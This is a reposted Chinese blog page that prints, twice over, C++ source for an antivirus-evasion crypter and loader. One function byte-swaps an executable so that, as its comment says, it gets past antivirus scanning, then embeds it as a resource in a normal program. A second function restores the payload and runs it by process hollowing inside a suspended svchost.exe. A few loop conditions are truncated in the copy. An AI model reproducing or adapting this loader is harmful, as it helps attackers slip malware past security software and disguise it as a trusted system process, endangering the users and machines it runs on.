通用exe编程免杀[转贴]
2010-11-10 03:15
232 查看
01 //修改过的可执行程序以资源的形式添加到另外一个正常的可执行程序中
02 BOOL Deformation(CString strRstFile,CString strDstFile)
03 {
04 CFile file;
05 BYTE *rstdata;
06 DWORD dwLen;
07 HANDLE hUpdateRes;
08 BOOL result;
09 LPBYTE p;
10 //把要当成资源的文件读入内存
11 file.Open(strRstFile, CFile::modeRead);
12 dwLen=file.GetLength();
13 rstdata=new BYTE[dwLen];
14 file.ReadHuge(rstdata, dwLen);
15 file.Close();
16
17 // 为数据分配空间
18 p = (LPBYTE)GlobalAlloc(GPTR, dwLen);
19 if (p == NULL)
20 {
21 MessageBox("分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
22 return 0;
23 }
24 // 复制资源数据
25 CopyMemory((LPVOID)p, (LPCVOID)rstdata, dwLen);
26 //这里我把前后两位的值颠倒,使其可以通过杀软的查杀
27 for (DWORD i=0; i28 {
29 if (i%2 ==0)
30 {
31 CopyMemory((LPVOID)(p + i), (LPCVOID)(rstdata + i + 1), 1);
32 CopyMemory((LPVOID)(p + i + 1), (LPCVOID)(rstdata + i), 1);
33 }
34 i++;
35 }
36
37 //将资源写入目标exe文件
38 hUpdateRes=BeginUpdateResource(strDstFile, FALSE);
39 result=UpdateResource(hUpdateRes, _T("PI"), MAKEINTRESOURCE(1001), MAKELANGID(LANG_NEUTRAL, SUBLANG_SYS_DEFAULT), (LPVOID)p, dwLen);
40 result=EndUpdateResource(hUpdateRes, FALSE); //必须是FALSE,否则不更新
41 return result;
42 }
//将修改过的可执行程序读入内存,并恢复原状,然后加以运行。
001 bool OnBuild()
002 {
003 // TODO: Add your control notification handler code here
004 HRSRC hResInfo;
005 HGLOBAL hResData;
006 DWORD dwSize;
007 LPBYTE p;
008 LPBYTE q;
009
010 // 查找所需的资源
011 hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_PI1), "pi");
012 if (hResInfo == NULL)
013 {
014 MessageBox("查找资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
015 return 0;
016 }
017 // 获得资源尺寸
018 dwSize = SizeofResource(NULL, hResInfo);
019 // 装载资源
020 hResData = LoadResource(NULL, hResInfo);
021 if (hResData == NULL)
022 {
023 MessageBox("装载资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
024 return 0;
025 }
026 // 为数据分配空间
027 p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
028 if (p == NULL)
029 {
030 MessageBox("p分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
031 return 0;
032 }
033
034 q = (LPBYTE)GlobalAlloc(GPTR, dwSize);
035 if (q == NULL)
036 {
037 MessageBox("q分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
038 return 0;
039 }
040 // 复制资源数据
041 ::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
042 ::CopyMemory((LPVOID)q, (LPCVOID)LockResource(hResData), dwSize);
043 // 这里把可执行程序修复正确
044 for (DWORD i=0; i045 {
046 if (i%2 ==0)
047 {
048 ::CopyMemory((LPVOID)(p + i), (LPVOID)(q + i + 1), 1);
049 ::CopyMemory((LPVOID)(p + i + 1), (LPVOID)(q + i), 1);
050 }
051 i++;
052 }
053
054 IMAGE_DOS_HEADER DosHeader;
055 IMAGE_NT_HEADERS NtHeader;
056
057 PROCESS_INFORMATION pi;
058 STARTUPINFO si;
059 CONTEXT context;
060 PVOID ImageBase;
061 unsigned long BaseAddr;
062 unsigned long retByte = 0;
063 LONG offset;
064
065 HMODULE hNtDll=GetModuleHandle("ntdll.dll");
066 if(!hNtDll)
067 return FALSE;
068 ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtDll,"ZwUnmapViewOfSection");
069
070 memset(&si, 0, sizeof(si));
071 memset(&pi, 0, sizeof(pi));
072 si.cb = sizeof(si);
073
074 ::CopyMemory((void *)&DosHeader,p,sizeof(IMAGE_DOS_HEADER));
075 ::CopyMemory((void *)&NtHeader,&p[DosHeader.e_lfanew],sizeof(IMAGE_NT_HEADERS));
076
077 //以挂起方式创建进程
078 BOOL res = CreateProcess(NULL,"C://windows//system32//svchost.exe",NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
079
080 if (res)
081 {
082 context.ContextFlags = CONTEXT_FULL;
083 if (!GetThreadContext(pi.hThread,&context)) //如果调用失败
084 {
085 CloseHandle(pi.hThread);
086 CloseHandle(pi.hProcess);
087 return FALSE;
088 }
089 ReadProcessMemory(pi.hProcess,(void *)(context.Ebx + 8),&BaseAddr,sizeof(unsigned long),NULL);
090 if (!BaseAddr)
091 {
092 CloseHandle(pi.hThread);
093 CloseHandle(pi.hProcess);
094 return FALSE;
095 }
096 //拆卸傀儡进程内存模块
097 if (ZwUnmapViewOfSection((unsigned long)pi.hProcess,BaseAddr))
098 {
099 CloseHandle(pi.hThread);
100 CloseHandle(pi.hProcess);
101 return FALSE;
102 }
103 ImageBase = VirtualAllocEx(pi.hProcess,
104 (void *)NtHeader.OptionalHeader.ImageBase,
105 NtHeader.OptionalHeader.SizeOfImage,
106 MEM_RESERVE|MEM_COMMIT,
107 PAGE_EXECUTE_READWRITE); //ImageBase 0x00400000
108 if (ImageBase == NULL)
109 {
110 DWORD wrongFlag = GetLastError();
111 CloseHandle(pi.hThread);
112 CloseHandle(pi.hProcess);
113 return FALSE;
114 }
115 //替换傀儡进程内存数据
116 if(!WriteProcessMemory(pi.hProcess, ImageBase, p, NtHeader.OptionalHeader.SizeOfHeaders, &retByte))
117 {
118 DWORD wrongFlag2 = GetLastError();
119 }
120 //DOS 头 + PE 头 + 区块表的总大小
121 //定位到区块头
122 offset = DosHeader.e_lfanew + sizeof(IMAGE_NT_HEADERS);
123 IMAGE_SECTION_HEADER secHeader;
124 WORD i = 0;
125 for (;i < NtHeader.FileHeader.NumberOfSections;i++)
126 {
127 //定位到各个区块
128 ::CopyMemory((void *)&secHeader, &p[offset + i*sizeof(IMAGE_SECTION_HEADER)],sizeof(IMAGE_SECTION_HEADER));
129 WriteProcessMemory(pi.hProcess,(LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress),&p[secHeader.PointerToRawData],secHeader.SizeOfRawData,&retByte);
130 VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress), secHeader.Misc.VirtualSize, PAGE_EXECUTE_READWRITE,&BaseAddr);
131 }
132
133 context.ContextFlags = CONTEXT_FULL;
134 //重置 执行文件入口
135 WriteProcessMemory(pi.hProcess, (void *)(context.Ebx + 8),
136 &ImageBase, //4194304
137 4, &retByte);
138 context.Eax = (unsigned long)ImageBase + NtHeader.OptionalHeader.AddressOfEntryPoint;
139 SetThreadContext(pi.hThread,&context);
140 ResumeThread(pi.hThread);
141 }
142
143 CloseHandle(pi.hThread);
144 CloseHandle(pi.hProcess);
145
146 GlobalFree((HGLOBAL)p);
147
148 return 0;
149 }
02 BOOL Deformation(CString strRstFile,CString strDstFile)
03 {
04 CFile file;
05 BYTE *rstdata;
06 DWORD dwLen;
07 HANDLE hUpdateRes;
08 BOOL result;
09 LPBYTE p;
10 //把要当成资源的文件读入内存
11 file.Open(strRstFile, CFile::modeRead);
12 dwLen=file.GetLength();
13 rstdata=new BYTE[dwLen];
14 file.ReadHuge(rstdata, dwLen);
15 file.Close();
16
17 // 为数据分配空间
18 p = (LPBYTE)GlobalAlloc(GPTR, dwLen);
19 if (p == NULL)
20 {
21 MessageBox("分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
22 return 0;
23 }
24 // 复制资源数据
25 CopyMemory((LPVOID)p, (LPCVOID)rstdata, dwLen);
26 //这里我把前后两位的值颠倒,使其可以通过杀软的查杀
27 for (DWORD i=0; i28 {
29 if (i%2 ==0)
30 {
31 CopyMemory((LPVOID)(p + i), (LPCVOID)(rstdata + i + 1), 1);
32 CopyMemory((LPVOID)(p + i + 1), (LPCVOID)(rstdata + i), 1);
33 }
34 i++;
35 }
36
37 //将资源写入目标exe文件
38 hUpdateRes=BeginUpdateResource(strDstFile, FALSE);
39 result=UpdateResource(hUpdateRes, _T("PI"), MAKEINTRESOURCE(1001), MAKELANGID(LANG_NEUTRAL, SUBLANG_SYS_DEFAULT), (LPVOID)p, dwLen);
40 result=EndUpdateResource(hUpdateRes, FALSE); //必须是FALSE,否则不更新
41 return result;
42 }
//将修改过的可执行程序读入内存,并恢复原状,然后加以运行。
001 bool OnBuild()
002 {
003 // TODO: Add your control notification handler code here
004 HRSRC hResInfo;
005 HGLOBAL hResData;
006 DWORD dwSize;
007 LPBYTE p;
008 LPBYTE q;
009
010 // 查找所需的资源
011 hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_PI1), "pi");
012 if (hResInfo == NULL)
013 {
014 MessageBox("查找资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
015 return 0;
016 }
017 // 获得资源尺寸
018 dwSize = SizeofResource(NULL, hResInfo);
019 // 装载资源
020 hResData = LoadResource(NULL, hResInfo);
021 if (hResData == NULL)
022 {
023 MessageBox("装载资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
024 return 0;
025 }
026 // 为数据分配空间
027 p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
028 if (p == NULL)
029 {
030 MessageBox("p分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
031 return 0;
032 }
033
034 q = (LPBYTE)GlobalAlloc(GPTR, dwSize);
035 if (q == NULL)
036 {
037 MessageBox("q分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
038 return 0;
039 }
040 // 复制资源数据
041 ::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
042 ::CopyMemory((LPVOID)q, (LPCVOID)LockResource(hResData), dwSize);
043 // 这里把可执行程序修复正确
044 for (DWORD i=0; i045 {
046 if (i%2 ==0)
047 {
048 ::CopyMemory((LPVOID)(p + i), (LPVOID)(q + i + 1), 1);
049 ::CopyMemory((LPVOID)(p + i + 1), (LPVOID)(q + i), 1);
050 }
051 i++;
052 }
053
054 IMAGE_DOS_HEADER DosHeader;
055 IMAGE_NT_HEADERS NtHeader;
056
057 PROCESS_INFORMATION pi;
058 STARTUPINFO si;
059 CONTEXT context;
060 PVOID ImageBase;
061 unsigned long BaseAddr;
062 unsigned long retByte = 0;
063 LONG offset;
064
065 HMODULE hNtDll=GetModuleHandle("ntdll.dll");
066 if(!hNtDll)
067 return FALSE;
068 ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtDll,"ZwUnmapViewOfSection");
069
070 memset(&si, 0, sizeof(si));
071 memset(&pi, 0, sizeof(pi));
072 si.cb = sizeof(si);
073
074 ::CopyMemory((void *)&DosHeader,p,sizeof(IMAGE_DOS_HEADER));
075 ::CopyMemory((void *)&NtHeader,&p[DosHeader.e_lfanew],sizeof(IMAGE_NT_HEADERS));
076
077 //以挂起方式创建进程
078 BOOL res = CreateProcess(NULL,"C://windows//system32//svchost.exe",NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
079
080 if (res)
081 {
082 context.ContextFlags = CONTEXT_FULL;
083 if (!GetThreadContext(pi.hThread,&context)) //如果调用失败
084 {
085 CloseHandle(pi.hThread);
086 CloseHandle(pi.hProcess);
087 return FALSE;
088 }
089 ReadProcessMemory(pi.hProcess,(void *)(context.Ebx + 8),&BaseAddr,sizeof(unsigned long),NULL);
090 if (!BaseAddr)
091 {
092 CloseHandle(pi.hThread);
093 CloseHandle(pi.hProcess);
094 return FALSE;
095 }
096 //拆卸傀儡进程内存模块
097 if (ZwUnmapViewOfSection((unsigned long)pi.hProcess,BaseAddr))
098 {
099 CloseHandle(pi.hThread);
100 CloseHandle(pi.hProcess);
101 return FALSE;
102 }
103 ImageBase = VirtualAllocEx(pi.hProcess,
104 (void *)NtHeader.OptionalHeader.ImageBase,
105 NtHeader.OptionalHeader.SizeOfImage,
106 MEM_RESERVE|MEM_COMMIT,
107 PAGE_EXECUTE_READWRITE); //ImageBase 0x00400000
108 if (ImageBase == NULL)
109 {
110 DWORD wrongFlag = GetLastError();
111 CloseHandle(pi.hThread);
112 CloseHandle(pi.hProcess);
113 return FALSE;
114 }
115 //替换傀儡进程内存数据
116 if(!WriteProcessMemory(pi.hProcess, ImageBase, p, NtHeader.OptionalHeader.SizeOfHeaders, &retByte))
117 {
118 DWORD wrongFlag2 = GetLastError();
119 }
120 //DOS 头 + PE 头 + 区块表的总大小
121 //定位到区块头
122 offset = DosHeader.e_lfanew + sizeof(IMAGE_NT_HEADERS);
123 IMAGE_SECTION_HEADER secHeader;
124 WORD i = 0;
125 for (;i < NtHeader.FileHeader.NumberOfSections;i++)
126 {
127 //定位到各个区块
128 ::CopyMemory((void *)&secHeader, &p[offset + i*sizeof(IMAGE_SECTION_HEADER)],sizeof(IMAGE_SECTION_HEADER));
129 WriteProcessMemory(pi.hProcess,(LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress),&p[secHeader.PointerToRawData],secHeader.SizeOfRawData,&retByte);
130 VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress), secHeader.Misc.VirtualSize, PAGE_EXECUTE_READWRITE,&BaseAddr);
131 }
132
133 context.ContextFlags = CONTEXT_FULL;
134 //重置 执行文件入口
135 WriteProcessMemory(pi.hProcess, (void *)(context.Ebx + 8),
136 &ImageBase, //4194304
137 4, &retByte);
138 context.Eax = (unsigned long)ImageBase + NtHeader.OptionalHeader.AddressOfEntryPoint;
139 SetThreadContext(pi.hThread,&context);
140 ResumeThread(pi.hThread);
141 }
142
143 CloseHandle(pi.hThread);
144 CloseHandle(pi.hProcess);
145
146 GlobalFree((HGLOBAL)p);
147
148 return 0;
149 }
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- [转贴]关于exe形式编程的一点心得,希望对大家有所帮助
- 利用svchost进程作为傀儡达到exe编程免杀
- ASP.NET 让无码编程不在是梦 -.NET通用平台、通用权限、易扩展、多语言、多平台架构框架
- VC++通用控件编程
- 编程知识汇总--3D模型文件的通用格式:FBX
- Java高效编程之二【对所有对象都通用的方法】
- 【转贴】DXUT编程指南(四):通过DXUT使用设备
- [Design Patterns]高级 DAO 编程(转贴)
- 通用字符串表达式编译运行库FORCAL V7.0 编程指南
- GPU及GPU通用计算编程模型简介
- 通用数据库操作类c#(转贴)
- 通用编程能力训练:template
- [Windows编程] 通过GetModuleHandleEx 得到函数调用者所在的DLL/EXE
- Media Foundation学习笔记(八)编程练习:一个通用视频文件播放器
- [转贴] Windows编程和面向对象技术 chap4
- 双向循环链表 C语言通用编程的思考
- (转贴)世界编程大赛一等奖作品!
- [推荐]ASP编程通用函数收藏大全第1/2页
- C语言编程时出现 “ld.exe窗口” 错误
- 转贴(电脑报):J2ME无线通信编程入门